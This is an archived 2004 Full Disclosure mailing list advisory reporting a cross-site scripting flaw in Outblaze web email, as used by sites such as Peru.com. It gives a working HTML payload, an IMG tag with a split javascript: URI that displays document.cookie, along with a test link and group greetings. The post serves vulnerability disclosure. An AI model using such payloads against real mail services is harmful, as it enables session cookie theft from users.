Full Disclosure mailing list archives
Cross-Site Scripting email Outblaze
From: "DarkBicho" <darkbicho () fastmail fm>
Date: Sun, 18 Jul 2004 03:05:40 -0700
Original Advisory: http://www.swp-zone.org/archivos/advisory-09.txt ------------------------------------------------------------------------------------------------- :.: Cross-Site Scripting email Outblaze :.: PROGRAM: Outblaze Email HOMEPAGE: http://www.outblaze.com/ BUG: Cross-Site Scripting DATE: 23/05/2004 AUTHOR: DarkBicho Web: http://www.darkbicho.tk team: Security Wari Proyects <www.swp-zone.org> PerUnderforce <www.perunderforce.tk> Email: darkbicho () peru com ------------------------------------------------------------------------------------------------- 1.- Intro: ~~~~~~ Outblaze Web based e-mail supports SMTP and POP3 Internet protocols, which allows it to be used as a front-end to multiple e-mail accounts. some Web that uses Outblaze Email linumail.org, Peru.com, bolivia.com y colombia.com etc. 2.- Exploit: ~~~~~~~ In order to operate this coarse single fault with sending following code HTML: <IMG SRC="javasc
ript:alert (document.cookie)";" border="0" height="1" width="1"> Example: http://www.swp-zone.org/archivos//linuxmail.gif 3.- Test: ~~~~ http://darkbicho.iberhosting.net/email/ 4.- Greetings: ~~~~~~~~~ greetings to my Peruvian group swp, perunderforce. "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho () peru com ------------------------------------------------------------------------------------------------- ___________ ____________ / _____/ \ / \______ \ \____ \\ \/\/ /| ___/ / \\ / | | /_____ __ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]---------------------------------------------- DarkBicho Web: http://www.darkbicho.tk "Mi unico delito es ver lo que otros no pueden ver" ---------------------- The End ---------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Cross-Site Scripting email Outblaze DarkBicho (Jul 18)